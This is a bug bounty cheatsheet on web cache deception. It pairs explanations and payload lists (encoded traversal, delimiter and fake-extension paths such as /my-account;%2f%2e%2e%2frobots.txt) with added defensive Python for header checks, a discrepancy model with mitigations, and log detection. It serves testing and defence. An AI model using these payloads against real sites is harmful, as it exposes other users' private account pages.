Web Cache Deception: Cheatsheet

Bug Bounty Cheatsheet: Web Cache Deception

This is a personal cheatsheet for testing potential Web Cache Deception vulnerabilities.
Key Testing Tips

  • Always verify caching behavior using X-Cache or Cache-Control headers.
  • Use encoded characters (%2f, %3b, etc.) to bypass browser-side normalization: browsers resolve a literal ../ before the request is sent, but leave the encoded form alone.
  • Focus on identifying discrepancies between cache servers and origin servers:
    • Does the server normalize paths?
    • Which delimiters are allowed?
    • Are static file extensions or directories cached?
    • Is the request immediately cached or processed first?
  • Use tools like Burp Suite Intruder or custom scripts to automate testing.
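The first tip, verifying caching behaviour from headers, is the step everything else depends on. The helper below is an added example, not from the original cheatsheet: it parses Cache-Control, reads X-Cache and Age, and classifies a pair of back-to-back responses to the same URL; the header dicts are constructed samples. X-Cache is a vendor-specific header (hit/miss values are common but not standardised), whereas Age is defined by the HTTP caching RFC, so both are consulted.

```python
"""Interpret caching headers from back-to-back responses to the same URL.
Added example; all sample headers below are constructed, not captured from a real site."""


def _header(headers, name):
    """Case-insensitive header lookup on a plain dict (what most HTTP clients hand back)."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None


def parse_cache_control(value):
    """Split a Cache-Control value into {directive: argument_or_None}; directive names are case-insensitive."""
    directives = {}
    for part in value.split(","):
        part = part.strip()
        if not part:
            continue
        name, _, arg = part.partition("=")
        directives[name.strip().lower()] = arg.strip().strip('"') if arg else None
    return directives


def is_storable(headers):
    """May a shared cache store this response, judging by explicit Cache-Control directives only?
    (Heuristic caching of responses without freshness information is deliberately ignored.)"""
    cc = parse_cache_control(_header(headers, "Cache-Control") or "")
    if "no-store" in cc or "private" in cc:
        return False
    return any(directive in cc for directive in ("public", "max-age", "s-maxage"))


def served_from_cache(headers):
    """Evidence that this response came out of a cache: X-Cache starting with 'hit', or a positive Age."""
    x_cache = (_header(headers, "X-Cache") or "").lower()
    if x_cache.startswith("hit"):
        return True
    age = _header(headers, "Age")
    return age is not None and age.isdigit() and int(age) > 0


def cache_verdict(responses):
    """responses: header dicts from identical requests sent one after another.
    'cached-despite-headers' is the interesting verdict: the cache served a hit although the origin
    said no-store/private, i.e. a URL-shape rule is overriding the origin's caching headers."""
    hit_after_first = any(served_from_cache(h) for h in responses[1:])
    storable = is_storable(responses[-1])
    if hit_after_first:
        return "cached" if storable else "cached-despite-headers"
    return "not-cached"


# Constructed samples: a public asset, and a per-user page a misconfigured cache serves anyway.
SAMPLE_MISS = {"Cache-Control": "max-age=3600, public", "X-Cache": "miss"}
SAMPLE_HIT = {"Cache-Control": "max-age=3600, public", "X-Cache": "hit", "Age": "12"}
SAMPLE_PRIVATE_MISS = {"Cache-Control": "private, no-store", "X-Cache": "miss"}
SAMPLE_PRIVATE_HIT = {"Cache-Control": "private, no-store", "X-Cache": "hit"}
SAMPLE_NOSTORE = {"Cache-Control": "no-store", "X-Cache": "miss"}

if __name__ == "__main__":
    print("asset   :", cache_verdict([SAMPLE_MISS, SAMPLE_HIT]))
    print("account :", cache_verdict([SAMPLE_PRIVATE_MISS, SAMPLE_PRIVATE_HIT]))
    print("no-store:", cache_verdict([SAMPLE_NOSTORE, SAMPLE_NOSTORE]))
```

Feed it the headers of two identical requests; the verdict that matters during review is "cached-despite-headers", because a cache that ignores no-store on a per-user response is exactly the condition the rest of this cheatsheet relies on.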

1. Exploiting Path Mapping Discrepancies

What is it?

Occurs when the origin server abstracts the URL path (many paths, such as /my-account/anything, are handled by the same /my-account endpoint) while the cache server decides cacheability from the literal path, for example by its file extension.

How to Identify

  • Add arbitrary segments (e.g., /my-account/abc) or extensions (e.g., /my-account/abc.js).
  • Observe X-Cache headers:
    • X-Cache: miss on the first request.
    • X-Cache: hit on subsequent requests if cached.

Exploitation Examples

  1. Payload: /my-account/abc.js
    • The cache sees a .js extension and treats the response as a static resource, while the origin still serves the /my-account page, so the per-user page is stored under that key.
    • Test Case: /robots.txt after a segment: /aaa/..%2frobots.txt.
    • Test Case: /my-account/aaa.css.

2. Exploiting Path Delimiters

What is it?

Some characters (;, ?, %23) are treated as delimiters by the origin server but ignored by the cache server, so the cache keys and stores the response for the full string (including a fake static extension) while the origin routes on the truncated, dynamic path.

How to Identify

  • Test delimiters (?, ;, %23, etc.) using Intruder.
  • Compare status codes: 200 OK means the origin truncated at the character and still reached the real endpoint (it is a delimiter there); 404 means it treated the character as part of the path.

Exploitation Examples

  1. Payload: /my-account;%2f%2e%2e%2frobots.txt
    • The cache stores the response under a key that looks like /robots.txt, but the content is the /my-account page the origin served.
    • Test Case: /api/users;%2f%2e%2e%2fstatic.
    • Test Case: /my-account%3bconfig.json.

3. Exploiting Origin Server Normalization

What is it?

The origin server resolves paths (e.g., ../), but the cache server doesn’t, so the cache keys on the static-looking literal path while the origin serves the resolved dynamic one, leading to cached sensitive responses.

How to Identify

  • Add encoded traversal sequences (e.g., /aaa/..%2fmy-account).
  • Check for normalization discrepancies via X-Cache headers.

Exploitation Examples

  1. Payload: /resources/..%2fmy-account
    • The cache keys on the literal /resources/… path (a static-looking prefix), while the origin resolves it to /my-account and serves that page.
    • Test Case: /static/..%2fprofile.
    • Test Case: /images/..%2fadmin.

4. Exploiting Cache Server Normalization

What is it?

The cache server normalizes paths while the origin server doesn’t, leading to exposure of sensitive dynamic content.

How to Identify

  • Add encoded traversal and observe X-Cache behavior:
    • X-Cache: miss on the first request followed by X-Cache: hit on the repeated request indicates caching.

Exploitation Examples

  1. Payload: /my-account;%2f%2e%2e%2frobots.txt
    • The cache normalizes the path to /robots.txt and stores the response under that key, while the origin stops at ; and serves /my-account.
    • Test Case: /assets/../admin.
    • Test Case: /static/../config.

5. Exploiting Exact-Match Cache Rules

What is it?

Caches store responses for specific file names (e.g., /robots.txt) even if accessed via manipulated paths.

How to Identify

  • Test paths like /my-account/robots.txt.
  • Add traversal (..%2f) to check normalization.

Exploitation Examples

  1. Payload: /my-account;%2f%2e%2e%2frobots.txt
    • The cache’s exact-match rule for /robots.txt fires on the normalized path, and the stored response is the /my-account page.
    • Test Case: /api/admin/robots.txt.
    • Test Case: /images/favicon.ico.
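The five discrepancy classes above (path mapping, delimiters, origin-side normalization, cache-side normalization and exact-match rules) all come down to the cache and the origin reading one raw path differently. The Python model below is an added example, not code from the cheatsheet: the static-extension, prefix and exact-match rules, the delimiter set and the route table are constructed stand-ins for a real cache and framework. It runs each section's payload under the configuration that section describes, and then under the two configurations that make the same payloads harmless.

```python
"""Model of how a cache and an origin can read the same raw URL differently.
Added illustration; rule sets and route table are constructed, not taken from any real product."""
import posixpath
from urllib.parse import unquote

STATIC_EXTS = {".js", ".css", ".png", ".jpg", ".ico", ".svg", ".txt", ".json", ".xml", ".html"}
STATIC_PREFIXES = ("/static/", "/resources/", "/assets/", "/images/")
EXACT_MATCH = {"/robots.txt", "/favicon.ico"}           # exact-match cache rules (section 5)
SENSITIVE_ROUTES = {"/my-account", "/admin", "/profile", "/api/users"}  # per-user pages (constructed)


def normalize(path):
    """One round of percent-decoding followed by dot-segment resolution."""
    return posixpath.normpath(unquote(path))


def cache_decision(raw_path, cache_normalizes):
    """What the cache does: returns (will_store, cache_key). It judges only the URL shape,
    never who the response belongs to; a normalizing cache keys on the normalized path."""
    key = normalize(raw_path) if cache_normalizes else raw_path
    if key in EXACT_MATCH or key.startswith(STATIC_PREFIXES):
        return True, key
    return posixpath.splitext(key)[1].lower() in STATIC_EXTS, key


def origin_route(raw_path, delimiters, origin_normalizes, strict):
    """What the origin does: truncate at its delimiters, optionally normalize, then route.
    strict=False models frameworks that map /my-account/<anything> onto /my-account (section 1)."""
    path = raw_path
    for delimiter in delimiters:
        path = path.split(delimiter, 1)[0]
    if origin_normalizes:
        path = normalize(path)
    if path in SENSITIVE_ROUTES or path in EXACT_MATCH:
        return path
    if not strict:
        for route in SENSITIVE_ROUTES:
            if path.startswith(route + "/"):
                return route
    return None  # 404


def deception_risk(raw_path, cache_normalizes=False, origin_normalizes=True,
                   delimiters=(";", "?"), strict=False, dynamic_no_store=False):
    """True when the cache would store a response the origin built for a per-user route.
    dynamic_no_store models an origin that sends Cache-Control: no-store on such responses,
    with a cache that honours it; that closes every URL-shape discrepancy at once."""
    will_store, _key = cache_decision(raw_path, cache_normalizes)
    route = origin_route(raw_path, delimiters, origin_normalizes, strict)
    if route not in SENSITIVE_ROUTES or dynamic_no_store:
        return False
    return will_store


if __name__ == "__main__":
    # The cheatsheet's payloads, each under the configuration its section describes.
    cases = [
        ("/my-account/abc.js", {}),                                   # 1: path mapping
        ("/my-account;abc.js", {}),                                   # 2: delimiter
        ("/resources/..%2fmy-account", {}),                           # 3: origin normalizes, cache does not
        ("/my-account;%2f%2e%2e%2frobots.txt",
         {"cache_normalizes": True, "origin_normalizes": False}),      # 4/5: cache normalizes, exact-match rule
        ("/resources/..%2fmy-account", {"cache_normalizes": True}),   # both sides normalize alike: safe
        ("/my-account;abc.js", {"dynamic_no_store": True}),           # origin marks page no-store: safe
    ]
    for path, cfg in cases:
        print(f"{path:40} {str(cfg or 'default'):60} risk={deception_risk(path, **cfg)}")
```

The last two cases are the mitigation view: a cache that normalizes exactly as the origin does removes the discrepancy for traversal payloads, and an origin that marks per-user responses Cache-Control: no-store (with a cache that honours it instead of overriding it with extension rules) neutralises all five classes regardless of URL shape. Note that strict routing alone does not help against delimiters, since the origin still reaches /my-account after truncating at ;.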

Expanded Testing Payloads

1. Delimiters-Based Payloads

  • /my-account?abc.js
  • /my-account;abc.js
  • /my-account#abc.js
  • /my-account%3fabc.js (%3f = ?)
  • /my-account%3babc.js (%3b = ;)

2. File Extensions-Based Payloads

  • /admin/secret.js
  • /profile/config.xml
  • /my-account/config.json

3. Encoded Path Traversal-Based Payloads

  • /static/..%2fadmin
  • /assets/%2e%2e%2fprofile
  • /resources/%252e%252e%252fconfig

4. Double Extension Payloads

  • /admin/backup.json.css
  • /api/v1/endpoint.html.js
  • /user/profile.txt.png

5. Misinterpreted File Names

  • /profile;.jpg
  • /backup?version=1.js
  • /static/admin.svg#logo

6. Combination Payloads

  • /my-account;%2f%2e%2e%2fadmin/config.json
  • /static/image?../admin.js

7. Language and Framework-Specific Payloads

  • PHP: /static/%2e%2e/admin.css
  • Python: /resources/%u002e%u002e/config
  • ASP.NET: /public/%20admin

8. Path Tricks with Query Strings

  • /my-account?api_key.js
  • /dashboard/admin.js?source=config
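Seen from the defender's side, the payload families above leave recognisable traces in access logs: encoded traversal sequences, a delimiter followed by a static extension, static extensions under routes that only serve per-user content, and cache hits on those routes. The detector below is an added example, not part of the cheatsheet; the log format (client, request line, status, cache status), the route list and the sample lines are all constructed.

```python
"""Flag access-log requests that look like web cache deception probes, and cache hits on per-user routes.
Added example; the log format, route list and sample lines are constructed."""
import posixpath
import re
from urllib.parse import unquote

# Constructed format: <client> "<method> <path> HTTP/x.y" <status> <cache-status>
LOG_RE = re.compile(
    r'^(?P<client>\S+) "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<cache>\S+)$'
)
SENSITIVE_ROUTES = ("/my-account", "/admin", "/profile", "/api/users")  # constructed
STATIC_EXT = r"\.(?:js|css|png|jpg|ico|svg|txt|json|xml|html)$"
STATIC_EXT_RE = re.compile(STATIC_EXT, re.I)
# ".." in plain, single- or double-encoded form, followed by a plain or encoded slash
ENCODED_TRAVERSAL_RE = re.compile(r"(?:%2e|%252e|\.){2}(?:%2f|%252f|/)", re.I)
# a path delimiter (plain or encoded) with a static extension after it and no further slash
DELIMITER_THEN_EXT_RE = re.compile(r"(?:;|\?|#|%3b|%3f|%23)[^/]*" + STATIC_EXT, re.I)


def normalized_route(raw_path):
    """Decode once, cut at ; ? #, resolve dot segments, and return the per-user route hit, if any.
    This over-approximates what an origin may do, which is what a detector wants."""
    path = re.split(r"[;?#]", unquote(raw_path), maxsplit=1)[0]
    path = posixpath.normpath(path)
    for route in SENSITIVE_ROUTES:
        if path == route or path.startswith(route + "/"):
            return route
    return None


def analyze_line(line):
    """Return the list of finding tags for one log line (empty list means nothing suspicious)."""
    match = LOG_RE.match(line)
    if not match:
        return ["unparsed"]
    path, cache = match.group("path"), match.group("cache").lower()
    findings = []
    if ENCODED_TRAVERSAL_RE.search(path):
        findings.append("encoded-traversal")
    if DELIMITER_THEN_EXT_RE.search(path):
        findings.append("delimiter-before-static-extension")
    route = normalized_route(path)
    if route and STATIC_EXT_RE.search(path):
        findings.append("static-extension-on-dynamic-route")
    if route and cache == "hit":
        findings.append("cache-hit-on-dynamic-route")  # the actual impact, not just a probe
    return findings


def scan(log_text):
    """Return {raw path: set of findings} for every line that produced at least one finding."""
    report = {}
    for line in log_text.splitlines():
        findings = analyze_line(line)
        if findings:
            match = LOG_RE.match(line)
            report.setdefault(match.group("path") if match else line, set()).update(findings)
    return report


# Constructed sample log: one benign asset, one normal account view, then three probe patterns.
SAMPLE_LOG = """\
203.0.113.5 "GET /static/style.css HTTP/1.1" 200 hit
203.0.113.5 "GET /my-account HTTP/1.1" 200 miss
203.0.113.7 "GET /my-account/abc.js HTTP/1.1" 200 miss
203.0.113.7 "GET /my-account/abc.js HTTP/1.1" 200 hit
203.0.113.7 "GET /my-account;%2f%2e%2e%2frobots.txt HTTP/1.1" 200 hit
203.0.113.9 "GET /resources/..%2fadmin HTTP/1.1" 200 miss
"""

if __name__ == "__main__":
    for path, findings in scan(SAMPLE_LOG).items():
        print(f"{path:45} {sorted(findings)}")
```

The "cache-hit-on-dynamic-route" tag is the one to alert on: the others show someone probing, that one shows the cache actually returning a per-user page under a shared key. In a real pipeline the LOG_RE would be replaced by the parser for the cache's own log format; the path checks carry over unchanged.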

Testing Workflow

  1. Identify Target Endpoints:
    • Look for dynamic content like /my-account or /admin.
    • Analyze X-Cache and Cache-Control headers.
  2. Test Path Mapping:
    • Add arbitrary segments or extensions and observe responses.
  3. Test Delimiters:
    • Use characters like ;, ?, %23, %3f.
  4. Test Normalization:
    • Inject encoded traversal sequences (..%2f).
  5. Combine Findings:
    • Use mismatches to craft payloads for cache poisoning.

Quick Examples

  1. Static Cache Rules:
    • Payload: /api/users;%2f%2e%2e%2fstatic.css
  2. Delimiter Discrepancies:
    • Payload: /my-account?abc.js
  3. Normalization Exploit:
    • Payload: /resources/..%2fadmin

Final Notes

  • Tailor payloads to the application’s framework and cache configuration.
  • Automate testing using wordlists and tools like Burp Intruder.
  • Always check caching headers (X-Cache, Cache-Control) to confirm behavior.

This post is licensed under CC BY 4.0 by the author.